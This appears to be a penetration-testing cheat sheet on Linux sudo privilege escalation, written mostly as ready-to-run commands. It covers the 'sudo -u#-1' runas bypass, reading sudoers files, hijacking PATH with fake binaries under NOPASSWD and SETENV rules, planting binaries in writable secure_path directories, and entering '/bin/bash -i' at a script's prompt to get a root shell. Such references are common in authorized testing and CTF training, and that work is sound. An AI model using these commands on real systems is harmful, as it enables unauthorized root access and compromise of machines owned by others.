Sudo Privilege Escalation
Last modified: 2023-02-23
Sudo commands might be vulnerable to privilege escalation (PrivEsc).
GTFOBins provides a wide variety of payloads to privilege escalation.
So it's recommended to look for in there.
If the sudo version <=1.28, try the following command.
sudo -u#-1 /bin/bash
As Another Users
sudo su root sudo -u john whoami # -s: run shell as target user sudo -s
Sudo commands (Sudoers)
sudo -l sudo -ll # Specify hostname sudo -h <host-name> -l # Execute via the hostname sudo -h <host-name> /bin/bash
Also we might see from following files.
cat /etc/sudoers cat /etc/sudoers.d/usersgroup
If we find the following result for sudoers,
(ALL, !root) NOPASSWD: /bin/bash
We might be able to get a root shell as follow.
sudo -u#-1 /bin/bash
Command Forgery (NOPASSWD)
If you are allowed to execute some command, you can forge the contents of the command.
First off, check the properties.
sudo -l (root) NOPASSWD: somecmd
If you can confirm that it can be executed as root without password, create the same named command in the arbitrary folder in which you can write files.
# option 1 echo /bin/sh > /tmp/somecmd
Next, change the permission for allowing to execute it.
And add the path to the environment.
chmod +x /tmp/somecmd export PATH=/tmp:$PATH
Now execute the command as root.
sudo somecmd whoami # root
Command Forgery (SETENV, NOPASSWD)
If you found there is a SETENV: in sudoers, you can set the PATH when running the command.
sudo -l (root) SETENV: NOPASSWD: somecmd
As the previous section, prepare the payload.
echo '/bin/bash -p' > /tmp/somecmd chmod +x /tmp/somecmd
Now run the command as root with setting the PATH.
sudo PATH=/tmp:$PATH somecmd whoami
Command Path Hijacking
sudo -l env_reset secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin (root) python /home/user/example.py
If we can execute some command as root but
secure_path are set, we cannot override the PATH environment variable.
Instead we need to check if we have permission to write each path.
ls -al /usr/local/ ls -al /usr/ ls -al /
Assume we can write an arbitrary binary file under
/usr/sbin, we can create a payload in there.
For example, we create a
python binary under
echo /bin/bash > /usr/sbin/python chmod +x /usr/sbin/python
Then execute the sudo command.
sudo python /home/user/example.py
Now we should get a root shell.
Shell in Prompt
read -p "What's you name: "
If we found there is another user’s script which can be executed as root, you can input `/bin/bash -i` to get a shell as another user.